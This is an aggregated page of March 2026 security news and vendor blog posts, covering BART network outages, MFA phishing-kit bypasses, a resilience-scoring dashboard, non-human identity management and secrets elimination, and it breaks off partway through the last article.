Technology

Related News

The IBM scientist who rewrote the rules of information just won a Turing Award

  • Sascha Brodsky
  • Published date: 2026-03-22 11:53:37

What started as a conversation on the beach between two scientists led to the “Nobel Prize in computing” decades later. More on Charles Bennett, co-recipient of the 2025 Turing Award.

One strange property of quantum information is that it cannot be copied. Classical information can be duplicated perfectly and infinitely. Copy a file, and you have two identical files. At the quant… [+3555 chars]

Hyped Samvadini and Desi AI GenZ Keyboard launched for secure messaging and multilingual communication

  • TOI Education
  • Published date: 2026-03-22 06:32:33

Anuvadini AI has launched Hyped Samvadini and the Desi AI GenZ Keyboard to address growing concerns around digital security, privacy, and reliance on foreign communication platforms. The applications offer encrypted messaging, SIM and device-based authenticat…


This is all it takes to stop a train (Lock and Code S07E06)

  • None
  • Published date: 2026-03-22 00:00:00


<p><em>This week on the Lock and Code podcast…</em></p><p>Forget the runaway train thrillingly shot in Buster Keaton’s 1926 film “The General,” and never mind the charging locomotive rescued by actors Denzel Washington and Chris Pine in the 2010 film “Unstoppable,” as there’s a far more frequent (and far less heart-pounding) railcar drama happening across California’s Bay Area: The repeated breakdown of the Bay Area Rapid Transit (BART) system, all because of a few networking errors. </p><p>Opened in 1972, BART today carries about 175,000 people every weekday on five separate lines to 50 different stations placed across dozens of cities in the Bay Area, including San Francisco, Oakland, Berkeley, Daly City, Fremont, Richmond, and more. Its tracks and railcars travel both above ground and below, and it is one of the only public transit systems in the US that goes underwater—traveling through what is called the TransBay tube. It is likely the region’s largest public project, spanning 131 miles of track, with a fleet of more than 700 cars, proving vital to workers and residents everywhere, and on May 9, 2025, it all came grinding to a halt, due to what BART officials called a “computer networking problem.”</p><p>At the Glen Park station in San Francisco, would-be travelers found yellow caution tape at the entry gates. At the El Cerrito Plaza station, BART staff and police informed visitors that the system was down. And at the Rockridge station in Oakland, a reporter for The San Francisco Chronicle witnessed a small group of people sprinting up the stairs to try and catch a train that never came.</p><p>It was the kind of meltdown for public infrastructure that puts an entire system in peril.</p><p>And it happened again just months later.</p><p>In September, a network crash brought BART to a halt, repeating almost the exact same frustrations and delays for travelers left without transportation to work.</p><p>That’s the end of it, right? Wrong. 
In February 2026, <em>another</em> computer failure caused another outage. </p><p>So, in one of the wealthiest regions in America, the subway doesn’t always run, its network is prone to crash, and any money for technology often goes elsewhere. </p><p>Today, on the Lock and Code podcast with host David Ruiz, we speak with San Francisco Chronicle transportation reporter Rachel Swan about what the BART outages revealed about the state of the system’s aging technology, why public infrastructure so often struggles to modernize, and what exactly went wrong in the three prior outages.</p><blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow"> <p>“One piece of equipment—and again, this is old equipment—one piece breaks down and they completely lose visibility, so they don’t know where any of the trains are.”</p> </blockquote><p>Tune in today to listen to the full conversation. </p><p><em>Show notes and credits:</em></p><p>Intro Music: “Spellbound” by Kevin MacLeod (<a href="http://incompetech.com/" rel="noreferrer noopener">incompetech.com</a>)<br>Licensed under Creative Commons: By Attribution 4.0 License<br><a href="http://creativecommons.org/licenses/by/4.0/" rel="noreferrer noopener">http://creativecommons.org/licenses/by/4.0/</a><br>Outro Music: “Good God” by Wowa (unminus.com)</p><hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"><p><strong>Listen up—Malwarebytes doesn’t just talk cybersecurity, we provide it.</strong></p><p>Protect yourself from online attacks that threaten your identity, your files, your system, and your financial well-being with our <a href="https://try.malwarebytes.com/lockandcode/">exclusive offer for Malwarebytes Premium Security for Lock and Code listeners</a>.</p><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://www.malwarebytes.com/">Malwarebytes</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by Malwarebytes">Malwarebytes</a>. Read the original post at: <a href="https://www.malwarebytes.com/blog/podcast/2026/03/this-is-all-it-takes-to-stop-a-train-lock-and-code-s07e06">https://www.malwarebytes.com/blog/podcast/2026/03/this-is-all-it-takes-to-stop-a-train-lock-and-code-s07e06</a> </p>

CTG Launches Cyber Resilience Scoring Dashboard to Give CISOs a Single Risk Number

  • None
  • Published date: 2026-03-22 00:00:00


<p>CTG, now operating under the Cegeka Group, is rolling out a cyber resilience scoring dashboard at RSAC 2026 that boils an organization’s security posture down to one number.</p><p>The dashboard consolidates results from multiple security assessments into a single view. It produces an overall resilience score, domain-level maturity indicators, and progress tracking mapped to NIST, ISO 27001, and CIS frameworks. The idea is straightforward: give CISOs something concrete to bring into board-level conversations about risk and investment.</p><p>That gap between what security teams know and what boards can act on has been a persistent problem. CTG is positioning this tool as the bridge.</p><p>“Cybersecurity has long been a boardroom topic, but conversations are still too abstract,” said Fabrice Wynants, Global VP of Cybersecurity and Networking at Cegeka. “Executives want to understand where the organization stands, which actions are required, and whether those actions contribute to stronger cyber resilience. You can only demonstrate that with clear and consistent data.”</p><p>The dashboard is part of Cegeka’s Security Advisory Framework (CSAF), a modular system that pairs assessments with advisory services for continuous security improvement. Time-based scoring and trend visibility let organizations track whether their remediation work is actually moving the needle.</p><p>“This is not about a single absolute score,” said Chad Alessi, Managing Director of CTG Cybersecurity. 
“CISOs need to be able to demonstrate that they are making the right decisions, that their approach is working, and that the organization is becoming more resilient.”</p><p>CTG will be demoing the dashboard at Booth 1161 in Moscone South, March 23 through 26.</p>

FIRESIDE CHAT: In the AI age, your MFA, authentication apps can be compromised in minutes

  • None
  • Published date: 2026-03-22 00:00:00


<div class="entry" morss_own_score="5.445652173913044" morss_score="37.61623446518499"> <img decoding="async" src="https://www.lastwatchdog.com/wp/wp-content/uploads/Fireside-Chat_2025_brshed-960x609.jpg"> <h5>By Byron V. Acohido</h5> <p>The authentication layer that corporate America spent a decade building is now a liability.</p> <p><em><strong>Listen to the podcast:</strong><a href="https://soundcloud.com/byron-acohido/token-podcast-reduce-room?si=6b6ffba72873484581bea0a16583e93b&amp;utm_source=clipboard&amp;utm_medium=text&amp;utm_campaign=social_sharing">The day MFA became the problem</a></em></p> <p>That’s the blunt assessment of Kevin Surace, chairman of <a href="https://www.tokencore.com/">Token</a>, a Rochester, N.Y.-based security company whose biometric hardware is drawing attention from enterprise security teams and federal regulators alike. Surace made the case in a recent LastWatchdog Fireside Chat podcast ahead of RSAC 2026.</p> <p>The numbers back him up. When Microsoft dismantled the <a href="https://www.microsoft.com/en-us/security/blog/2026/03/04/inside-tycoon2fa-how-a-leading-aitm-phishing-kit-operated-at-scale/">Tycoon 2FA</a> phishing kit last year, investigators confirmed the tool had been used to execute 96,000 successful break-ins — every one of them bypassing a legitimate authentication app.</p> <p>“All the MFA you’ve been using and all the auth apps you’ve been using are compromisable in minutes,” Surace said. “If someone wants to compromise them, that’s the bottom line.”</p> <p>The shift accelerated, Surace explained, when major platforms began mandating MFA. Salesforce’s move to enforce its authenticator app across its entire customer base became a flare in the sky for threat actors. 
Within a week, kits to defeat it were in circulation.</p> <p><a href="https://www.lastwatchdog.com/wp/wp-content/uploads/token-use-case.png"><img decoding="async" src="https://www.lastwatchdog.com/wp/wp-content/uploads/token-use-case-520x332.png"></a>Token’s answer is hardware-bound biometric authentication. The company’s Token Ring and Token BioStick devices store a user’s fingerprint locally, cryptographically bind it to a specific domain, and require physical proximity to complete a login. No credential leaves the device. No remote relay attack can replicate it.</p> <p>Insurance carriers and the FBI have begun signaling the same direction — pushing organizations toward phishing-proof biometric authentication as a baseline standard.</p> <p>“Shut the front door,” Surace said. “If the front door was closed and locked and deadbolted, you wouldn’t worry about getting in the network as much.”</p> <p><a href="https://www.lastwatchdog.com/wp/wp-content/uploads/Byron-sepia-hedcut-1.png"><img decoding="async" src="https://www.lastwatchdog.com/wp/wp-content/uploads/Byron-sepia-hedcut-1-100x139.png"></a></p> <p>Acohido</p> <p><em><a href="https://www.lastwatchdog.com/pulitzer-centennial-highlights-role-journalism/">Pulitzer Prize-winning </a>business journalist Byron V. Acohido is dedicated to fostering public awareness about how to make the Internet as private and secure as it ought to be.</em></p> <p><em>(<strong>Editor’s note</strong>: I used Claude and ChatGPT to assist with research compilation, source discovery, and early draft structuring. All interviews, analysis, fact-checking, and final writing are my own. 
I remain responsible for every claim and conclusion.)</em></p> <p>March 22nd, 2026 </p></div><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://www.lastwatchdog.com">The Last Watchdog</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by bacohido">bacohido</a>. Read the original post at: <a href="https://www.lastwatchdog.com/fireside-chat-in-the-ai-age-your-mfa-authentication-apps-can-be-compromised-in-minutes/">https://www.lastwatchdog.com/fireside-chat-in-the-ai-age-your-mfa-authentication-apps-can-be-compromised-in-minutes/</a> </p>

How relieved are you with your secrets vaulting strategy

  • None
  • Published date: 2026-03-21 00:00:00


<h2>Are You Confident in Your Secrets Vaulting Strategy?</h2><p>The management of machine identities—what the industry terms Non-Human Identities (NHIs)—has become a linchpin in safeguarding cloud environments. When organizations increasingly transition to cloud-based architectures, ensuring the security of NHIs and their associated secrets is paramount. But how can organizations feel truly reassured in their secrets vaulting strategy?</p><h3>The Critical Nature of Non-Human Identities</h3><p>NHIs act as the digital emissaries of modern cybersecurity, represented by encrypted passwords, tokens, or keys. Much like a passport, these secrets are identifiers that grant machines access to various systems. Their management, however, is far more complex than mere authentication. It involves securing both the identities (analogous to a traveler) and their access credentials (akin to a passport), alongside constantly monitoring their behavior within systems.</p><p>The significance of NHI management becomes clearer when we consider the multitude of applications and systems that rely on these identities. From financial services to healthcare, and even DevOps and SOC teams, the need to secure the vast array of machine identities is universal.</p><h3>Seamless Integration and Security Gaps</h3><p>The divergence between security and research and development teams has often led to vulnerabilities. This disconnect can result in unsecured machine identities, creating exploitable opportunities for nefarious actors. Addressing this gap demands a cohesive strategy that integrates NHI management effectively across all departments.</p><p>By establishing a secure cloud environment, organizations can bridge these gaps. This involves a proactive approach that spans the entire lifecycle of NHIs—from discovery to classification, and threat detection to remediation. 
Unlike point solutions such as secret scanners that merely scratch the surface, a robust NHI management platform provides comprehensive insights into ownership, permissions, usage patterns, and potential vulnerabilities.</p><h3>Why Context-Aware Security Matters</h3><p>A context-aware approach to NHI management offers a panoramic view of machine identities and their secrets. With this perspective, organizations can:</p><ul> <li><strong>Reduce Risk:</strong> By proactively identifying and mitigating security risks, the likelihood of breaches and data leaks is significantly diminished.</li> <li><strong>Improve Compliance:</strong> Organizations can better meet regulatory requirements through policy enforcement and audit trails.</li> <li><strong>Enhance Efficiency:</strong> By automating the management of NHIs and secrets, security teams can redirect focus towards strategic initiatives.</li> <li><strong>Gain Enhanced Visibility and Control:</strong> A centralized view for access management and governance provides a clearer understanding of security frameworks.</li> <li><strong>Achieve Cost Savings:</strong> Automation in secrets rotation and NHIs decommissioning reduces operational costs.</li> </ul><p>The stakes are high, and the rewards of an effective strategy are substantial. While industries evolve, adopting a comprehensive NHI management strategy ensures that security measures evolve alongside.</p><h3>Real-World Applications and Insights</h3><p>In practice, integrating secrets management with cloud services like <a href="https://itnext.io/secrets-management-in-azure-for-kubernetes-with-app-configuration-key-vault-and-managed-identity-261cee3eb490" rel="noopener">Azure</a> can offer robust protection. 
Similarly, whilst working with Kubernetes, a harmonious integration with tools such as ArgoCD and HashiCorp Vault showcases effective secrets management, as discussed on <a href="https://www.reddit.com/r/kubernetes/comments/1jc4ise/best_way_to_integrate_argocd_and_hashicorp_vault/" rel="noopener">Reddit</a>.</p><p>For further insights on how to scale these solutions, the <a href="https://entro.security/blog/how-elastic-scaled-secrets-nhi-security-elastics-playbook-from-visibility-to-automation/">Elastic Playbook</a> provides a valuable case study. Meanwhile, the challenges posed by hybrid cloud environments necessitate an introspective look at security strategies, as explored in the <a href="https://entro.security/blog/secrets-security-in-hybrid-cloud-environments/">Secrets Security in Hybrid Cloud Environments</a> article.</p><h3>Striving for AI Security</h3><p>Incorporating AI-driven analytics within your NHI management solutions can lead to a more dynamic and adaptable security posture. AI security offers predictive insights, alerting organizations to potential threats before they materialize. Because machine learning models are trained on comprehensive datasets, they’re able to identify anomalies that could indicate a breach, optimizing both detection and response times.</p><p>The integration of AI into secrets vaulting strategies not only enhances the security of machine identities but also empowers organizations with a level of foresight that previously seemed unattainable. By leveraging AI, businesses can automate routine tasks, streamline operations, and achieve a higher degree of security.</p><h3>Building a Future-Proof Strategy</h3><p>The conversation around secrets vaulting and NHI management is far from static. As technology shifts, organizations must stay agile, adapting their strategies to ensure robust defenses. 
Emphasizing a holistic approach, companies can transcend traditional barriers, crafting solutions that address both current needs and future challenges.</p><p>Ultimately, by establishing a comprehensive strategy that incorporates these elements, organizations can achieve a sense of relief and confidence. This level of assurance is vital where threats are persistent and evolving. Consider the various facets of NHI management and their role in fortifying your security infrastructure.</p><p>Stay informed and stay secure, ensuring your enterprise remains a fortress against evolving threats.</p><h3>Optimizing NHI Management Across Industries</h3><p>How are specific industries uniquely leveraging NHI management to tackle security challenges? With the diverse needs of sectors such as financial services, healthcare, and tech operations, understanding how these spaces employ NHI management can offer valuable insights.</p><p>In financial services, where vast amounts of sensitive data are transmitted daily, ensuring robust machine identity management is crucial. The potential consequences of a security breach, including financial loss and reputational damage, accentuate the need for a comprehensive strategy. Proactively securing NHIs not only protects against unauthorized access but also contributes significantly to maintaining customer trust and adhering to rigorous compliance standards. Leveraging AI technologies further enhances the capabilities to detect anomalies swiftly, offering a layer of preemptive defense.</p><p>Healthcare’s embrace of NHI management is underscored by the shift towards digital health records and telemedicine. The need to safeguard patient data while ensuring seamless interoperability between different healthcare systems highlights the critical nature of having secure NHIs. 
Here, encryption and automated secret management can mitigate potential data breaches, ensuring that patient confidentiality remains inviolable.</p><p>In DevOps and SOC teams, the journey towards enriched machine identity management is embedded. By integrating automated NHI management tools, these teams can expedite software deployment cycles while maintaining stringent security protocols. This marriage of speed and security exemplifies how comprehensive NHI strategies can support next-generation development environments.</p><h3>Navigating the Complex NHI Ecosystem</h3><p>Why do Non-Human Identities remain complex and fragmented for many organizations? While striving for comprehensive NHI management, companies must navigate various challenges that can impact their efficacy and security posture.</p><p>First, understanding the scope of machine identity infrastructure can be daunting. Organizations need to identify active NHIs and determine the level of access or privileges each identity should hold. This task is compounded by the requirement to regularly update secrets, ensuring they remain secure and don’t become potential vectors for attacks. By employing AI-driven visibility and monitoring tools, corporations can streamline this often labor-intensive process, ensuring more consistent and secure management of machine identities.</p><p>The integration of disparate systems also presents a challenge, where many organizations find themselves relying on a patchwork of security tools and platforms. This fragmentation can lead to blind spots in security coverage, providing potential vulnerabilities for cyber threats to exploit. A holistic approach that advocates for the convergence of NHI and secrets management into a unified platform can sidestep these pitfalls, fostering seamless interoperability and enhanced situational awareness.</p><p>Moreover, the dynamic nature of cyber threats necessitates an adaptable approach to NHI management. 
Machine identities must be constantly monitored and assessed against emerging threats. Organizations are well-positioned when leveraging a multi-faceted strategy that includes AI augmentation and real-time analytics to remain agile and responsive.</p><h3>A Collaborative Approach to NHI Management</h3><p>How can organizations foster collaboration to enhance their NHI management strategies? The future of NHIs lies not just in technological advances but also in cultivating a collaborative mindset that spans departments and teams.</p><p>Security doesn’t reside solely within IT or cybersecurity departments. A cross-functional strategy that involves stakeholders from R&amp;D, operations, and leadership teams is imperative. By facilitating dialogues between these groups, organizations can better align their security goals with business objectives, ensuring that NHI management efforts are both technically sound and strategically aligned with the organization’s mission.</p><p>Training and awareness programs also play a pivotal role in building a security-conscious culture. By equipping staff with the understanding and skills necessary to recognize potential security threats and the importance of managing machine identities, organizations can enhance their NHI security posture. This collective awareness propagation can translate into more robust and resilient defenses against potential breaches.</p><h3>Continuous Improvement with a Future Perspective</h3><p>Is your organization currently evaluating its NHI strategies for continuous improvement? The commitment to evolving NHI management should be an ongoing process, prompted by regular assessments and refinements of strategies and technologies.</p><p>Companies engaged in reflective audits of their NHI management practices often discover areas for improvement, whether in policy enforcement, automation of secrets management, or expanding the contextual understanding of NHIs across various platforms. 
It is important to remain informed on <a href="https://entro.security/blog/entro-custom-secrets-self-serve-detection-rules-across-code-cloud-and-agents/">best practices and innovations</a>, as they provide the foundation for building and maintaining a resilient security posture.</p><p>Ultimately, the layered complexities of non-human identities require a strategic and forward-thinking approach, where security measures are not only robust but also nimble enough to adapt to constantly shifting security. Through the diligent application of comprehensive NHI management strategies, organizations can fortify their defenses, ensuring secure and efficient cloud environments that meet current demands and are prepared for future challenges.</p><p>The steps taken in strengthening NHI management will prove vital as the digital frontier continues to expand, making organizations more resilient and prepared for tomorrow’s opportunities and threats.</p><p>The post <a href="https://entro.security/how-relieved-are-you-with-your-secrets-vaulting-strategy/">How relieved are you with your secrets vaulting strategy</a> appeared first on <a href="https://entro.security/">Entro</a>.</p><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://entro.security/">Entro</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by Alison Mack">Alison Mack</a>. Read the original post at: <a href="https://entro.security/how-relieved-are-you-with-your-secrets-vaulting-strategy/">https://entro.security/how-relieved-are-you-with-your-secrets-vaulting-strategy/</a> </p>

Does your NHI system deliver essential value

  • None
  • Published date: 2026-03-21 00:00:00

None

<h2>Is Your Organization’s Non-Human Identity Strategy Robust Enough?</h2><p>What if the backbone of your organization’s cybersecurity strategy is more susceptible to breaches than you think? As machine identities increasingly outnumber human ones, focusing on Non-Human Identities (NHIs) is critical. NHIs serve as the “tourists” navigating through vast cloud environments. Much like human identities, they require a “passport” (encrypted passwords, tokens, or keys) to access various systems. But are these NHIs managed with the same precision as human credentials?</p><h3>Understanding the NHI System</h3><p>The core of an NHI system lies in its ability to manage “Secrets,” those valuable authentication tokens that grant machine identities access to different environments. Similar to how a visa complements a passport, permissions granted to these secrets determine the extent of access. This effectively transforms NHIs into dynamic entities whose lifecycle requires careful management, from their discovery and classification to threat detection and remediation.</p><p>A robust NHI management system delivers enormous <a href="https://entro.security/blog/harnessing-ai-in-ima-and-am/" rel="noopener">value</a> by identifying vulnerabilities before they become liabilities. Organizations often find themselves struggling to secure NHIs due to the disconnect between their security and R&amp;D teams. The result? Unsecured machine identities that could be gateways for potential threats.</p><h3>The Strategic Importance of NHI Management</h3><p>An effective approach to managing NHIs emphasizes a comprehensive strategy rather than relying solely on point solutions like secret scanners, which only offer partial protection. 
Here are some key benefits of an efficient NHI system:</p><ul> <li><strong>Reduced Risk:</strong> By proactively identifying and mitigating risks, the likelihood of breaches and data leaks is minimized.</li> <li><strong>Improved Compliance:</strong> Ensures adherence to regulatory requirements through policy enforcement and <a href="https://entro.security/blog/entro-joins-the-silverfort-isa/" rel="noopener">audit trails</a>.</li> <li><strong>Increased Efficiency:</strong> Automating the management of NHIs and secrets enables security teams to focus on strategic initiatives.</li> <li><strong>Enhanced Visibility and Control:</strong> Offers a centralized view for access management and governance, allowing better oversight of machine identities.</li> <li><strong>Cost Savings:</strong> Automating secrets rotation and decommissioning of NHIs reduces operational costs significantly.</li> </ul><h3>The Real-World Impact Across Industries</h3><p>The importance of managing NHIs resonates across different sectors. In financial services, for instance, where high-value transactions occur, a breach could be catastrophic. Efficient NHI management provides a layer of protection that helps prevent unauthorized access to sensitive information. Similarly, in healthcare, where patient data privacy is paramount, machine identities ensure that only authorized systems can access sensitive information, thus maintaining compliance with regulatory requirements like HIPAA.</p><p>In sectors that demand agility, such as DevOps and SOC teams, NHIs facilitate seamless operations. The ability to automate machine identities and secrets management allows teams to deploy new applications swiftly, without compromising on security. This is particularly crucial for organizations operating in cloud environments, where the pace of change is rapid.</p><h3>Addressing Common Challenges in NHI Management</h3><p>While the benefits of an effective NHI system are clear, challenges remain. 
One of the most significant hurdles is the lack of visibility into the sprawling web of machine identities. Without a centralized platform, it’s easy for machine identities to fall through the cracks, leaving organizations vulnerable to attacks.</p><p>Another challenge is managing the lifecycle of NHIs. From the time a secret is created to its eventual decommissioning, each stage requires meticulous management to ensure security. Automating this lifecycle can help address common pitfalls such as expired credentials or unauthorized access.</p><p>Lastly, the gap between security teams and R&amp;D can hinder effective NHI management. Bridging this gap through a unified approach allows for better collaboration and understanding of the security needs throughout the development process.</p><h3>Enhancing Value Delivery Through Context-Aware Security</h3><p>To fully realize the potential value of an NHI system, organizations must focus on context-aware security. This involves gaining insights into ownership, permissions, usage patterns, and potential vulnerabilities. By understanding the context in which machine identities are used, organizations can better tailor their security strategies to meet specific needs.</p><p>A context-aware approach not only enhances security but also boosts operational efficiency. Security teams can allocate resources more effectively, focusing on high-priority threats. This shift from a reactive to a proactive security posture delivers significant value by increasing resilience against cyber threats.</p><p>Where NHIs play an increasingly pivotal role in ensuring system integrity, organizations must evaluate whether their existing strategies deliver the essential value needed to safeguard their operations.</p><p>By understanding the strategic importance of Non-Human Identity management, companies can better protect themselves from emerging threats and optimize their cybersecurity efforts. 
It is not merely about compliance or ticking off a checklist; it’s about building a robust defense mechanism that evolves with the complexity of modern digital infrastructures.</p><p>As cybersecurity continues to evolve, the focus on NHIs will only grow in relevance, making it imperative for organizations to adopt a strategic, comprehensive approach that emphasizes context-aware security and lifecycle management. The question is, can your business afford to overlook this critical component of cybersecurity?</p><p>For more insights into future cybersecurity trends, <a href="https://entro.security/blog/cybersecurity-predictions-2025/" rel="noopener">click here</a>.</p><h3>Exploring Best Practices in NHI Management</h3><p>Have you ever considered how many machine identities are circulating within your organization’s digital framework, functioning unnoticed yet critically important? The effective management of these NHIs could often mean the difference between a formidable cybersecurity posture and a vulnerable network. Establishing best practices is essential for optimizing NHI management and securing these machine identities efficiently.</p><ul> <li><strong>Comprehensive Discovery and Classification:</strong> The first step is understanding your environment. Organizations must conduct thorough audits to identify all machines and their respective identities. This not only facilitates easy classification of NHIs but also enables immediate spotting of unauthorized or rogue entities.</li> <li><strong>Regular Secret Rotation:</strong> Just like passports and visas have expiration dates, so should secrets. Implementing regular secret rotation policies minimizes the risk of unauthorized access due to outdated or compromised credentials. 
Automation tools can be utilized to streamline this process, ensuring consistency and minimizing the burden on IT staff.</li> <li><strong>Effective Policy Enforcement:</strong> Establish clear-cut policies regarding access control and permissions. Using tools that can enforce these policies helps maintain strict boundaries around what machine identities can and cannot do.</li> <li><strong>Continuous Monitoring and Auditing:</strong> Implement robust systems for continuous monitoring and auditing of NHIs. Detecting anomalies early is crucial to thwart potential security breaches. Modern AI and machine learning tools are instrumental in analyzing patterns and detecting deviations indicative of security threats.</li> </ul><h3>Technological Transformations and NHI Management</h3><p>How does the perpetual wave of technological advancements shape the field of NHI management? As industries strive to adapt and harness new technologies, their approach to cybersecurity, especially concerning NHIs, must evolve concurrently.</p><p>Advancements in cloud computing, for instance, have revolutionized how organizations manage data and applications. However, this shift necessitates smarter strategies for managing machine identities. Given that cloud environments operate at different scales, often distributed across multiple locations, organizations must adopt NHI management solutions adept at handling a variety of environments seamlessly.</p><p>Additionally, the rise of artificial intelligence and machine learning comes as a double-edged sword. While AI can greatly enhance security analytics and automation within NHI management, it also introduces new targets for cyber threats. 
Thus, organizations must be vigilant in securing their AI systems, ensuring that machine learning models and data sets are protected and validated continuously.</p><h3>Industry Insights and the Path to Secure NHIs</h3><p>What impact do industry benchmarks and insights have on shaping robust NHI strategies? Industry examples can offer valuable insights into evolving best practices and technological adoptions.</p><p>For instance, the financial services industry has led the charge in integrating AI-driven analytics to oversee NHIs effectively. By leveraging sophisticated algorithms, these organizations extract crucial insights into user behaviors and take proactive measures before potential breaches occur. These technologies have also been employed successfully in combating fraudulent activities, a persistent issue that consistently challenges the sector.</p><p>In contrast, the healthcare industry faces its own unique challenges. The sensitivity of healthcare data makes these systems attractive targets for cyber criminals. By adopting a zero-trust approach, requiring all users and devices to authenticate before accessing sensitive data, healthcare organizations can better manage NHIs and protect patient privacy in compliance with regulations. For healthcare entities, aligning NHI management strategies with policy-driven frameworks like <a href="https://entro.security/blog/secrets-security-and-soc2-compliance/">SOC 2 compliance</a> acts as a crucial component of their risk management strategy.</p><h3>Collaboration for Enhanced Cybersecurity</h3><p>How important is collaboration in enhancing cybersecurity practices around NHIs? Beyond individual organizations, the broader cybersecurity community plays a crucial role in promoting awareness and implementing solutions to manage NHIs effectively.</p><p>Collaborative platforms encourage the sharing of threat intelligence, allowing entities to learn from each other’s experiences and counter similar threats preemptively. 
Organizations that actively participate in industry consortiums focused on cybersecurity can gain powerful insights into emerging threats, vulnerabilities, and most importantly, innovative solutions used globally.</p><p>Developing partnerships across industries can also facilitate resource sharing, provide access to specialized expertise, and open pathways for comprehensive risk mitigation strategies. Bridging the gap between diverse security communities ensures the harmonious integration of solutions that address the peculiarities of various sectors, leading to a more unified, secure cyberspace.</p><p>As organizations continue to navigate technological complexity, investing in NHI management should be a strategic imperative, not an afterthought. Cybersecurity experts who understand the intricate environments machine identities operate within can more effectively build frameworks that sustain and protect critical infrastructures.</p><p>The post <a href="https://entro.security/does-your-nhi-system-deliver-essential-value/">Does your NHI system deliver essential value</a> appeared first on <a href="https://entro.security/">Entro</a>.</p><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://entro.security/">Entro</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by Alison Mack">Alison Mack</a>. Read the original post at: <a href="https://entro.security/does-your-nhi-system-deliver-essential-value/">https://entro.security/does-your-nhi-system-deliver-essential-value/</a> </p>

Secrets Management vs. Secrets Elimination: Where Should You Invest?

  • None
  • Published date: 2026-03-21 00:00:00

None

<div data-elementor-type="wp-post" data-elementor-id="56394" class="elementor elementor-56394" data-elementor-post-type="post"> <div class="elementor-element elementor-element-1a6f5fe2 e-flex e-con-boxed e-con e-parent" data-id="1a6f5fe2" data-element_type="container" data-e-type="container"> <div class="e-con-inner"> <div class="elementor-element elementor-element-226716a5 elementor-widget elementor-widget-text-editor" data-id="226716a5" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p>Most organizations still treat credentials as something that must be protected, stored, and rotated. But a second model is quietly reshaping how machine authentication works: eliminate static secrets altogether and authenticate workloads using identity and <a href="https://aembit.io/blog/jit-access-workloads-eliminating-standing-privileges/">just-in-time access</a>. These two approaches represent different philosophies, different operational realities, and different long-term costs.</p> <p>It also isn’t a binary choice. Most organizations run a mix of modern cloud workloads, legacy systems, SaaS APIs, and <a href="https://aembit.io/blog/securing-ci-cd-pipelines-the-role-of-workload-identity-federation/">CI/CD pipelines</a>. Some of those environments support <a href="https://aembit.io/blog/securing-ai-agents-without-secrets/">secretless authentication</a> today, while others will always require a secrets manager. Understanding where each model fits, not picking a side, is the real strategic decision.</p> <h2>1. Two Security Philosophies, Explained Simply</h2> <p>Secrets management assumes <a href="https://aembit.io/blog/static-credentials-in-cloud-native-environments/">static credentials</a> are a fundamental part of your architecture. Its job is to store those credentials centrally, protect them, and rotate them regularly. Eliminating secrets takes the opposite view. 
It assumes static credentials are the root of the problem and removes them from the authentication path entirely by issuing short-lived credentials on demand.</p> <p>These philosophies produce two very different security and operational models.</p> <h3>Secrets Management</h3> <p>Secrets management exists to make static credentials as safe as they can be. It stores them in secure vaults, enforces access controls, rotates them on schedules, and provides auditing for compliance. When done well, it prevents hardcoded credentials, reduces the risk of accidental exposure, and protects legacy systems that cannot authenticate any other way.</p> <p>This model works because it accepts the premise that long-lived credentials will exist and need to be guarded.</p> <h3>Secrets Elimination</h3> <p>Secrets elimination does not protect static credentials; it removes them. Workloads authenticate using their identity, not a password or API key. After identity is verified, a short-lived credential is issued for that specific task and expires quickly after use. No static credential sits around waiting to be stolen.</p> <p>Different platforms use different mechanisms to validate identity. Cloud IAM systems often rely on built-in workload identities. Some modern identity platforms, including <a href="https://aembit.io/">Aembit</a>, use cryptographic attestation to verify the workload and its environment before issuing access. <a href="https://aembit.io/glossary/Attestation/">Attestation</a> is one method, not a universal requirement for all secretless systems.</p> <p>By removing static credentials from the ecosystem, the entire attack surface changes. But organizations must have the identity infrastructure in place to support this approach.</p> <h2>2. It’s Not Either/Or: Where Each Model Fits</h2> <p>Choosing between secrets management and secretless authentication is rarely an all-or-nothing decision. 
Each approach works best for specific types of credentials.</p> <h3>When Secrets Management Is the Right Tool</h3> <p>Some credentials inherently require a secrets manager because no identity-based integration exists:</p> <ul> <li><a href="https://aembit.io/glossary/API-key/">API keys</a> for SaaS providers</li> <li>Legacy databases using static passwords</li> <li>SSH keys and break-glass emergency access</li> <li>Third-party services that only support long-lived secrets</li> </ul> <p>In these situations, storing and rotating secrets centrally is still the most secure and operationally predictable option.</p> <h3>When Secretless Authentication Is the Better Fit</h3> <p>Secretless authentication shines in cloud-native and automated environments where workloads already have identity primitives:</p> <ul> <li>Service-to-service authentication within clouds</li> <li>Kubernetes workloads using service accounts or token projection</li> <li>CI/CD pipelines that can federate identity</li> <li>Multi-cloud APIs that accept identity tokens through OAuth or OIDC</li> </ul> <p>In these environments, static credentials add operational burden without providing additional security value. AI agents add urgency to this shift. Agentic AI workloads spin up dynamically, call multiple APIs per task, and operate across trust boundaries that change by the minute, making static credentials both impractical and dangerous at that scale.</p> <h3>Most Organizations Land in a Hybrid Model</h3> <p>A hybrid model, secretless for modern workloads, secrets management for legacy or external systems, is how most enterprises will operate for years. Secretless authentication reduces the number of secrets you must protect, while secrets management ensures the remaining ones are governed consistently.</p> <p>Surface area shrinks. Risk shrinks. Operational overhead shrinks. But compatibility is maintained.</p> <h2>3. 
